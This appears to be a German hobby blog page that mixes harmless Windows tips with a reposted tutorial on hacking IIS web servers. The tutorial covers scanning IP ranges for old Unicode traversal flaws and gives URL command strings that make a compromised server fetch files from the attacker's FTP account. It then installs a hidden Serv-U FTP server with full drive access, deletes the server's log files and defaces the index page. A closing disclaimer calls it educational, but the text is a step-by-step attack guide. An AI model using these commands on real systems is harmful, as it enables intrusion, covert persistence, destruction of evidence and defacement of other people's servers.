Worueber wollt ihr guides?
Schreibt eure Guide wuensche ins board 
danke
Meldet euch da bitte endlich an es ist sehr wichtig fuer uns zu wissen was ihr wollt;)
So grexsoft.net.tc wird verbessert
So nun sind alle da und die seite wird verbessert 
Wir brauchen noch vorschlaege waere nice wenn ihr es uns in unserer board schreibt Board.
Meldet euch bitte an und schreibt in die Topic : „Allgemein“
Hmm der webspace ist atm nicht ganz stabil Also versucht es wenn es nicht geht weiter =)
GrexSoftTeam
WinChat
Windows 2000 hat ein kleines Chat-Programm von Microsoft integriert, um dieses zu öffnen, befolgen Sie das Tutorial:
Klicken Sie auf Start–> Ausführen… und geben Sie dort Winchat ein.
Beschriftung von Verknüpfungen ausblenden
Haben Sie eine oder mehrere Verknüpfungen auf ihrem Desktop bei dehnen es reicht ein Bildchen zu sehen und der Text soll nicht angezeigt werden? Dann befolgen Sie das kommende Tutorial.
1. Klicken Sie mit der Rechtemaustaste auf die Verknüpfung dir keinen “Namen” mehr haben soll.
2. Nun öffnet sich ein Fenster in dem Sie auf Umbenennen klicken müssen.
3. Drücken Sie nun [Alt] und tippen gleichzeitig die Zahlen 0160 auf dem Ziffernblock ein.
Jetzt ist der Text unter dem Icon verschwunden.
Upper:Sylber
IIS (Server) Hacken
Habe mal was nettes gefunden und will es euch zeigen!!!Da viele klicks auf Hacking gehen gibt es hier was neues.
IIS (Server) Hacken by Ship (PyrOo)
Ich übernehme keine Verantwortung, fals ihr mit den Informationen etwas zerstört!
Bal bla bla.. ihr kennt den scheiss!
1) Einleitung
In diesem TUT werde ich erklären, wie man IIS Server hacken, defacen, und für die eigenen Zwecke brauchen kann.
Im ersten Teil wird beschrieben, wie dies über Programme geht, im zweiten Teil, wie man solche Server ohne Programme hackt.
2) Scannen
Die Schwachstelle eines IIS Servers liegt darin, dass man bei älteren Versionen über so genannte Unicodes schreiberechte hat. Das heisst, man kann auf alle Daten zugreifen und sie verändern.
Scannen ohne einen Scanner ist fast unmöglich, mann müsste bei jeder IP jeden Unicode ausprobieren, und das kann dauern. Also saugen wir uns erst mal einen Scanner! Ich beforzuge den FX-Scanner.
Dieser Scanner sucht nach IIS Server mit unicodes und nach FTP Server mit anonymous zugang.
Da die ofizielle Seite leider offline gegangen ist, habe ich die Install datei auf einen Tripod account geladen.
Wir saugen uns also schnell den FX-Scanner unter
So, nun installieren wir den scanner.. würde Deutsch empfehlen *g
Wir machen am besten einen Ordner auf den desktop und erstellen eine Verknüpfung des Scanners in den Ordner. So können wir immer schnell auf unsere Sachen zugreiffen.
Das Scannen ist keine sache. Ihr könnt die IP Range angeben mit z.B. 1.2.*.* (das heisst, dass der Scanner jz statt den *en alle zahlen durchgeht!)
Wenn ihr wollt, könnt ihr noch einen Proxy einstellen. Oder FxP Tests machen, aber eigentlich alles überflüssig.
Wenn der Scanner etwas findet, speichert er die daten in eine datei im Verzeichnis des Servers.
Da steht dan die IP, der Unicode, die Laufwerke (können wir später noch brauchen) und ob der Server eine Firewall hat. (haben sie meistens! Teure Firewalls aber iis bugs.. *g Peinlich!)
3) Hacken (mit Tools)
Das mit den Tools ist immer so eine Sache. Es giebt viel zu viele, die nicht wissen, was passiert, wenn sie auf einen Button ihrer Hackertools drücken. Meiner Meinung nach, ist es OK, wenn man mit Tools arbeitet. Aber nur, wenn man auch versteht, was da eigentlich Passiert! Sie sind schneller und bequemer!
Ich kenne nur 2 Tools, die für iishacking geeignet sind! Diese sind Azrael666 und IISDjinn ;]
Ihr bekommt sie auch unter (Namen: Azrael666 und IISDjinn…)
Ich muss noch sagen, dass IISDjinn noch nicht fertig gecodet ist. Ist aber ein echt gutes Programm! (thx an DjinnHunter187)
Mein Tipp: Erst IISDjinn und erst, wenn da irgend was nicht funtzt kommt Azrael666 zum Einsatz
Wir starten nun IISDjinn, dann geht’s so weiter:
- wir geben die Ip an und drückenmal Unicode 1, entweder kommt, dass du keine Rechte hast (oder Seite kann nicht angezeigt werden, usw.), oder du siehst die Festplatte c:
- Wir klicken auf „Log In“, wo wir die Festplatte sehen können
- Nun sehen wir die verschiedenen Befehle.. ich werde sie euch mal kurz erklären:
-
DIR Ihr könnt ein Verzeichnis angeben und auf DIR klicken, dann werdet ihr alle
Daten/Ordner in diesem Verzeichnis sehen (in den Scannresultaten steht ja, welche Verzeichnisse vorhanden sind)
MKDIR Mit diesem Befehl könnt ihr einen neuen Ornder erstellen…
COPY Mit den COPY Befehl könnt ihr sachen auf dem Server herumkopieren..
Diesen Befehl müsst ihr immmer gleich drücken, wenn ihr etwas auf den Server
machen wollt! (So kopiert ihr die cmd.exe ins internet verzeichnis)
REN Wenn ihr z.B. die index datei überschreiben wollt, wäre es nett, zuerst die alte index
absichert! Mit diesem Befehl, kann man also Dateien Kopieren und ihnen einen neuen Namen geben!
READ Mit READ könnt ihr sachen lesen und downlaoden, geht aber nicht mit allen Formaten! EXE zb nicht! (aber da kennen wir doch ne lösung! Kommt dan weiter unten! )
DEL Ist da, um Daten zu löschen
DELTREE Damit kann man einen ordner löschen!
VOL Giebt euch Infos zur Festplatte
ECHO mit Diesem Befehl könnt ihr die Index datei umschreiben! ;]
Einfach mal ein bisschen rumspielen!
4) Wichtig
Wer nicht viel in DOS arbeitet, wird nicht verstehen, wiso dies nicht funktioniert:
C:\gemeinsame Dateien\
Der Server merkt nicht, welchen Ordner du öffnen möchtest!
Da du in einem anderen System schreiben musst!
Wenn der Ordner „Hallo“ heisst, geht es ganz normal, da er keine Lehrzeichen beinhaltet.
Daher:
C:\Hallo\
Wenn der Ordner „Hallo du Arsch“ heisst, geht es anders, da zwischen den Wörtern Lehrzeichen stehen.
Das System ist ganz einfach:
Zuerst nimmt man die ersten 6 Buchstaben, der Ornder (hier also: Hallod) nun kommt noch ein ~1 dazu!
(es kann sein, dass es auch ~2 oder ~3 ist, einfach ausprobieren!)
Also:
C:\Hallod~1\
5) Downloaden (mit IISDjinn)
Wenn wir glück haben, können wir über den READ befehl die Datei saugen oder ansehen.
Fals es nicht geht ist dies nicht weiter schlimm.
Ich müsste fileicht noch etwas erklären…
Wenn wir die ip 1.2.3.4 haben, ist das ja ein Server, aber wenn wir in den Browser eingeben, sehen wir ja nicht die Festplatte, sondern eine Seite!
Alle Seiten sind im Ordner Laufwerk/inetpub/wwwroot/ gespeichert!
Das heisst, wenn wir die Datei, die wir saugen wollen in diesen Ordner kopieren, haben wir es schon geschaft!
Beispiel:
Wir möchten die datei „Geschäfte.doc downloaden!
Wir geben also beim COPY Befehl
Oben: c:\ordner\geschäfte.doc und
Unten: c:\inetpub\wwwroot\
an! (für c einfach den Laufwerknamen!)
nun gehen wir wieder in den Browser und geben folgedes ein:
und schon haben wir es geschaft!
Einfach oder? ;]
6) Uppen
Uppen würde ich ohne Programme, ist leichter so!
Aber ganz einfach wird es nicht!
Ich werde euch hier schnell den sichersen Weg beschreiben.
1) wir richten uns einen Tripod Account ein.
2) Wir uppen die Daten, die wir später auf den gehackten Server laden wollen auf diesen Account
3) Nun müssen wir die Daten nur noch vom Tripod Server auf unseren Server laden, dies geschieht so:
(zb. ich will nun eine index.htm und eine logo.jpg saugen)
(IP= IP des gehackten Server, c+mkdir+c:\temp\etc\etc\etc = erstellt dieses Verzeichnis)
(Befehl giebt uns schreiberechte!)
/scripts/superlol.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\temp\etc\ etc\etc\ftpscr.txt
(IP= IP des gehackten Server, ftp.mitgleid.lycos.de= Tripod ftp Server, 21=ftp Port)
http://IP/scripts/superlol.exe?/c+echo+USERNAME>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, USERNAME= euer Tripod Username)
http://IP/scripts/superlol.exe?/c+echo+PASSWORT>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, PASSWORT = euer Tripod FTP Passwort)
http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, BINARY= Format)
http://IP/scripts/superlol.exe?/c+echo+get+index.htm>>c:\temp\etc\etc\etc\ftpscr.t xt
(IP= IP des gehackten Server, index.htm=die Datei, die ich saugen will)
http://IP/scripts/superlol.exe?/c+echo+get+logo.jpg>>c:\temp\etc\etc\etc\ftpscr.tx t
(IP= IP des gehackten Server, logo.jpg = die 2. Datei, die ichs augen will)
http://IP/scripts/superlol.exe?/c+echo+quit>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, quit = ende)
(Dieser Befehl startet das Script!)
nun wird euch der Server die Daten runterladen! Ihr könnt sie dan noch herumkopieren! ;]
7) Pubstro
Jetzt wird’s ein wenig komplizierter, aber das hällt uns nicht auf, oder?
Los geht’s…
Zuerst einmal: Hier gehen fast nur Server ohne Firewall! Also sucht die ohne aus den scannresultaten raus!
Wir brauchen:
• Einen Browser (Internet Explorer, usw.)
• Proxy (zb jap) ist aber nicht unbedingt nötig!
• Ein FTP programm (zb FlashFxP [auch auf
• Wieder unseren Tripod Account
• Serv-u (auch auf )
1) erst insallieren wir Serv-U und konfigurieren den Port und die Login Daten
2) Wir öffnen Serv-U.ini und schreiben „INVISIBLE=TRUE“ dazu (dass uns der Admin nicht so schnell entdeckt.. )
3) Alles sollte dann in etwa so aussehen:
HomeDir=c:\
AlwaysAllowLogin=YES
Access1=h:\,RWAMCDLEP
Access2=g:\,RWAMCDLEP
Access3=f:\,RWAMCDLEP
Access4=e:\,RWAMCDLEP
Access5=d:\,RWAMCDLEP
Access6=c:\,RWAMCDLEP
Access7=j:\,RWAMCDLEP
Ihr solltet noch einen Zweiten User Account einrichten.
Also einen Root (mit schreiberechten) und einen Remote-user (ohne schreibrechte)
Würde dan ungefär so aussehen:
Access1=c:\,RLP
Access2=d:\,RLP (usw.)
4) Nun laden wir die Serv-U.exe und die konfigurierte serv-U.ini in das Hauptverzeichnis unseres Tripodaccounts
5) Nun erstellen wir auf den Server ein Verzeichnis, wo wir unser kleines serv-U platzieren wollen.. dieses Verzeichnis sollte möglichst unauffällig sein, damit der Admin nix merkt! (also bz. C:\temp\etc\etc\etc) der code sieht dan so aus:
(IP = Server IP)
Wenn das Verzeichnis erstellt wurde, sollte eine CGI-Fehlermeldung kommen!
6) Wir können nun noch nachschauen, ob das Verzeichnis auch wirklich existiert.
(ihr müsst den Pfad natürlich an eurem Verzeichnis anpassen *g)
wenn nun „ .. “ und irgendwas steht, wurde das Verzeichnis erstellt und wir waren erfolgreich.
7) nun müssen wir die cmd noch kopieren, damit wir den echo befehl nützen können!
Das sieht dann so aus:
Wir sind nun fast am Ziel. Nun erstellen wir eine .txt Datei, welche wir als FTP Script nutzen, damit sich der Server per FTP auf unserem Tripod Account einwählt und sich das Serv-U.exe/.ini downloadet (wie bei Download schon )
/scripts/superlol.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\temp\etc\ etc\etc\ftpscr.txt
(IP= IP des gehacken Server, ftp.mitgleid.lycos.de= Tripod ftp Server, 21=ftp Port)
http://IP/scripts/superlol.exe?/c+echo+USERNAME>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, USERNAME= euer Tripod Username)
http://IP/scripts/superlol.exe?/c+echo+PASSWORT>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, PASSWORT = euer Tripod FTP Passwort)
http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, BINARY= Format)
http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, serv-u.exe=die Datei, die ich saugen will)
http://IP/scripts/superlol.exe?/c+echo+get+serv-u.ini>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, serv-u.ini = die 2. Datei, die ich saugen will)
http://IP/scripts/superlol.exe?/c+echo+quit>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, quit = ende)
9) Noch ein kleiner Test, wir geben nun mal
ein.
Wenn etwas wie:
open ##IP-VOM-FTP-SERVER##
##USERNAME##
##PASSWORD##
BINARY
get serv-u.exe
get serv-u.ini
quit
erscheint, ist alles OK! :]
10) Nun führen wir unser Script aus, und zwar mit dieser Zeile:
Der Server connectet nun zu Tripod und saugt sich serv-U ;P
11) Unsere Daten liegen jz im InetPub Verzeichnis des Servers, da wir sie aber in unser Verzeichniss verschiben wollen, geben wir folgendes ein:
http://IP/scripts/superlol.exe?/c+move+serv-u*.*+“c:\temp\etc\etc\etc
12) Damit auch wirklich niemand merkt, dass wir hier waren, löschen wir die Script datei, mit:
13) Nun führen wir die Serv-U auf den Server aus, auch hierzu gibt es wieder einmal einen schönen Befehl:
14) So, nun warten wir ein paar Sekunden und loggen uns dan per FTP Programm (zb. FlashFxP) in den Server ein (nathürlich mit unseren vorher konfigurierten Daten ;] )
15) Nun sind wir im Root Verzeichnis des Severs und haben volle Schreibrechte … als nächstes suchen wir uns ein Unterverzeichniss oder erstellen eins, welches wir als das Verzeichniss benutzen, in das wir später uppen wollen!
16) Wir müssen nun das neue Verzeichnis auch in der serv-u.ini vermerken, also verändern und über die alte schreiben!!
Der Account mit den Schreibrechten müsste dan etwa so aussehen:
HomeDir=d:\Melinda\WORK\sample\LESSON\new\FUCK
AlwaysAllowLogin=YES
Access1=h:\,RWAMCDLEP
Access2=g:\,RWAMCDLEP
Access3=f:\,RWAMCDLEP
Access4=e:\,RWAMCDLEP
Access5=d:\,RWAMCDLEP
Access6=c:\,RWAMCDLEP
Access7=j:\,RWAMCDLEP
RelPaths=YES
und der Account zum Leechen so:
HomeDir=d:\Melinda\WORK\sample\LESSON\new\FUCK
RelPaths=YES
Access1=d:\Melinda\WORK\sample\LESSON\new\FUCK,RLP
17) Wir reconnecten, und tata.. wir sind in unserem Verzeichnis! (und sehen es als root-Verzeichnis) nen können wir uppen was das zeug hällt! *g oder die scheiss DSL Leitung
1 Nun nur noch die Logfiles killen.. und wir waren nie da! :]
Logfiles killen
Jedes mal, wenn ihr zu dem Server connectet, wird eure IP gespeichert! Blöde was? Vorallem wenn ihr ohne proxy hackt (wie ich leider manchmal *g)
Aber Windoof hat wie immer ne lösung
Die Logfiles befinden sich im ordner: c:\winnt\system32\logfiles\ (statt c einfach die Platte)
Wie ihr löschen könnt wisst ihr ja schon! ;]
9) Defacen
Decacen heisst soviel, wie die index.htm Datei des Servers umzuschreiben!
Dies geht über den echo Befehl (unten beschrieben) oder über das Download Pronzip!
Versucht euch selbst darin! Wenn die datei index.htm/.html oder default.htm/.html heisst, geht der Server automatisch darauf, wenn ihr die IP in den Browser eintippt!
10) Code sammlung
Wie versprochen hier noch die codes, um ohne Programme zu hacken!
Wer ein bisschen coden kann, kann sich ja seine Programme selber schreiben!
DIR =
(statt c:\ einfach das Verzeichnis)
MKDIR =
(statt testordner den neuen Ordner & Pfad)
COPY =
(c:\winnt\system… = diese Datei will ich kopieren, c:\inetpub… = in den inetpub\ Ordner mit dem Namen root.exe!)
REN =
(c:\inetpub\wwwroot\index.htm in backup.htm umbenennen)
READ =
(lese die Datei c.\winnt… hier die Logfiles ;] )
DEL =
(lösche alle Daten mit .htm Endung)
VOL =
(gibt Infos zu der Platte c:
ECHO = http://IP/scripts/root.exe?/c+echo+fuck%20tha%20world!%20by,%20Ship%20
>>c:\i netpub\wwwroot\index.htm
(schreibt den text: „fuck tha world! By Ship “ in die index.htm datei!
11) Ende
So, dass wars dan wieder mal von meiner Seite her! ;]
Ich werde bald wieder mal ein Tut schreiben, hoffe, es wird wieder genau so gross, wie dieses hier!
Ihr könnt den Text kopieren, aber bitte nicht verändern! (auch die Schreibfehler gehöhren zu mir *lol)
*** Dieses Tutorial dienst lediglich dazu, die Denkweise von Hackern zu verstehen!
Missbrauch ist strafbar! Ich hafte nicht für Schäden!
Upper:Sylber
Suchen Webspace
Hallo ,wir suchen einen webspace fuer Grexsoft.net.tc da der jetztige webspace es uns nicht erlaubt unsere Programme hochzuladen bekommen wir nicht genug besucher und wir wollen auch unsere produkte vorstellen .
Bitte meldet euch bei uns … Postet es hier oder in unserem forum GrexBoard.net.tc
Vielen Dank , ihr werdet auch etwas zurueck bekommen,
Euer GrexSoft-Team
*push*
Systemsteuerung „leer“ :)
Wenn Sie unter Windows Vista in die Systemsteuerung gehen, kann es vorkommen, dass nichts angezeigt wird. Das liegt daran das ältere Programme einige Funktionen deaktivieren können.
Wenn dies vorkommt gehen Sie folgendermaßen vor um alles angezeigt zu bekommen:
1. Drücken Sie die [Win] und [R] Taste und geben Sie in das kleine Fenster “services.msc” ein.
2. Bestätigen Sie mit einem Klick auf OK, nach einigen Sekunden sollte sich dann ein Fenster öffnen, in dem Sie auf “Softwarelizensierung” klicken müssen.
3. Nun öffnet sich wieder ein Fenster in dem Sie unten neben dem Starttyp “Automatisch” auswählen müssen.
Upper:Sylber
(Wb Other users)
Mehrere Uhren anzeigen
Unter Windows Vista gibt es die nette Funktion mehrere Uhren zu sehen, damit man weiß wie spät es z.B. in Amerika ist. Um dies einzustellen hilft das unten stehende Tutorial:
1. Klick Sie mit der rechten Maustaste auf die Uhr in der Taskleiste.
2. Klicken Sie nun auf “Datum/Uhrzeit ändern“.
Bild vergrößern
3. Jetzt öffnet sich ein Fenster, in dem Sie auf den Reiter “Zusätzliche Uhren” klicken.
4. Anschließend sehen Sie zwei mal das selbe abgebildet, (das heißt Sie können noch zwei Uhren extra einbauen) dort stellen Sie nun ein ob die Uhr angezeigt werden soll, wie Sie heißt und welche Zeitzone Sie haben soll. Nun müssen Sie nur noch mit einem klick auf OK bestätigen.
5. Um die Uhr anzuschauen klicken Sie einfach doppelt auf die Uhr in der Taskleiste.
Upper:Sylber
Wir bloggen noch!!!
Und suchen weitere blogger die fuer uns bloggen .
Bewerbungen bitte hier posten !!!
About Grexsoft
Grexsoft ist eine HobbyFirma die momentan verschiedene sachen erstellt.
Http://www.grexguides.de.ms <—New URL
Vote4Us.
Weiteres kommt noch
-
Letzte
-
Links
-
Archiv
- Januar 2008 (1)
- September 2007 (11)
- August 2007 (19)
-
Kategorien
-
RSS
RSS der Einträge
Kommentarfeed
